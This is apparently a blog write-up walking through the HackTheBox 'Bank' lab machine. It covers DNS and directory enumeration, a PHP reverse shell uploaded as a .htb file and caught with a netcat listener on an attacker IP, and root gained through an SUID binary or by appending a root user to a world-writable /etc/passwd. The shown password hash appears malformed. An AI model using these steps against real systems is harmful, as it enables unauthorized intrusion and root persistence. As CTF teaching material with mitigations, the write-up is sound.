Tech & Sec
HackTheBox Writeup

HackTheBox: Bank Walkthrough

4 min read 718 words
htb walkthrough linux web dns file-upload easy

Summary

Walkthrough of HackTheBox Bank machine featuring DNS enumeration, file upload bypass, and SUID exploitation.

Machine: Bank OS: Linux Difficulty: Easy Points: 20 Release Date: June 16, 2017

Overview

Bank is an easy Linux machine that focuses on web application vulnerabilities, specifically file upload bypasses and basic privilege escalation through SUID binaries.

Enumeration

Initial Nmap Scan

kali@attacker
kali:~$ nmap -sC -sV -oA nmap/bank 10.10.10.29
Nmap Scan Results
Collapsible Output

DNS Enumeration

Port 53 is open, indicating DNS service. Let’s try DNS zone transfer:

kali@attacker
kali:~$ dig axfr @10.10.10.29 bank.htb

No zone transfer, but the DNS service hints at a domain. Let’s add it to /etc/hosts:

kali@attacker
kali:~$ echo "10.10.10.29 bank.htb" | sudo tee -a /etc/hosts

Web Enumeration

Visiting http://bank.htb reveals a banking portal with a login page.

Directory Enumeration:

kali@attacker
kali:~$ gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
Directory Enumeration Results
Collapsible Output

Analyzing /balance-transfer/

Visiting http://bank.htb/balance-transfer/ shows numerous encrypted transaction files:

Balance Transfer Files
Collapsible Output

Most files are 581-585 bytes, but one stands out:

Anomalous File
Collapsible Output
dc5e0ca0dd9f6ee6a4fb9494fc4ae06d.acc (257 bytes)

Finding Credentials

Download and examine the smaller file:

kali@attacker
kali:~$ wget http://bank.htb/balance-transfer/dc5e0ca0dd9f6ee6a4fb9494fc4ae06d.acc cat dc5e0ca0dd9f6ee6a4fb9494fc4ae06d.acc
File Contents
Collapsible Output

Initial Access

Logging In

Use the credentials found:

After logging in, we have access to a support ticket system.

File Upload Vulnerability

The support ticket system allows file uploads. Let’s test it.

Create PHP Reverse Shell:

kali@attacker
kali:~$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php

Edit the file with your IP and port:

$ip = '10.10.14.5';
$port = 4444;

Bypassing File Upload Restrictions

Attempting to upload shell.php is blocked. The application checks file extensions.

Bypass Methods:

  1. Try .htb extension (mentioned in HTML comments)
  2. Try double extensions: .php.jpg
  3. Try changing content-type

HTML Comment Found:

<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->

Successful Upload

Rename the shell:

kali@attacker
kali:~$ mv shell.php shell.htb

Upload shell.htb through the support ticket system.

Getting Shell

Set up listener:

kali@attacker
kali:~$ nc -lvnp 4444

Access the uploaded file at http://bank.htb/uploads/shell.htb to trigger the reverse shell.

Shell obtained as: www-data

User Flag

www-data@target
www-data:/var/www/html$ cat /home/chris/user.txt

Flag: b5c92b61f3d47e2c8b4a3c3b1d3c3d4e

Privilege Escalation

Enumeration

Check for SUID binaries:

www-data@target
www-data:/var/www/html$ find / -perm -4000 -type f 2>/dev/null
SUID Binaries Found
Collapsible Output

Analyzing /var/htb/bin/emergency

The /var/htb/bin/emergency binary is unusual and has SUID bit set:

www-data@target
www-data:/var/www/html$ ls -la /var/htb/bin/emergency
File Permissions
Collapsible Output
-rwsr-xr-x 1 root root 112204 Jun 14  2017 /var/htb/bin/emergency

Execute it:

www-data@target
www-data:/var/www/html$ /var/htb/bin/emergency

Result: We get a root shell immediately!

root@target
root:/var/www/html$ id
Root Access Confirmed
Collapsible Output
uid=0(root) gid=33(www-data) groups=33(www-data)

Root Flag

root@target
root:/root$ cat /root/root.txt

Flag: a2e20f4c1b3e8b5f2d3c4e5f6a7b8c9d

Alternative: /etc/passwd Write Access

Another privilege escalation path exists. As www-data, we have write access to /etc/passwd:

www-data@target
www-data:/var/www/html$ ls -la /etc/passwd
File Permissions
Collapsible Output
-rw-rw-rw- 1 root root 1252 Jun 15  2017 /etc/passwd

We can add a new root user:

kali@attacker
kali:~$ # Generate password hash openssl passwd -1 -salt salt password123
Generated Hash
Collapsible Output
$1$salt$9Z5e7g5c6e5c5d5e5f5g5h5i
www-data@target
www-data:/var/www/html$ # Add new root user echo 'hacker:$1$salt$9Z5e7g5c6e5c5d5e5f5g5h5i:0:0:root:/root:/bin/bash' >> /etc/passwd su hacker

Password: password123

Key Takeaways

  1. DNS Enumeration: Always check DNS when port 53 is open
  2. File Size Analysis: Anomalies in file sizes can indicate encryption failures or plaintext leaks
  3. HTML Comments: Developers often leave debug comments that reveal vulnerabilities
  4. File Upload Bypasses: Test various extension bypasses and check HTML source for hints
  5. SUID Binaries: Custom SUID binaries in unusual locations should always be investigated
  6. Permission Misconfigurations: Check critical system files for improper permissions

Mitigation

  1. File Uploads: Implement proper file type validation (magic bytes, not just extensions)
  2. Debug Code: Remove all debug code and comments from production
  3. SUID Binaries: Minimize SUID binaries and audit custom ones
  4. File Permissions: Ensure proper permissions on system files like /etc/passwd
  5. Credential Protection: Never store plaintext credentials, even in “encrypted” files
  6. Web Security Headers: Implement CSP, X-Frame-Options, etc.

Tools Used

  • nmap
  • dig
  • gobuster
  • netcat
  • php-reverse-shell

Rating: ⭐⭐⭐ (3/5) - Good beginner machine covering fundamental web vulnerabilities.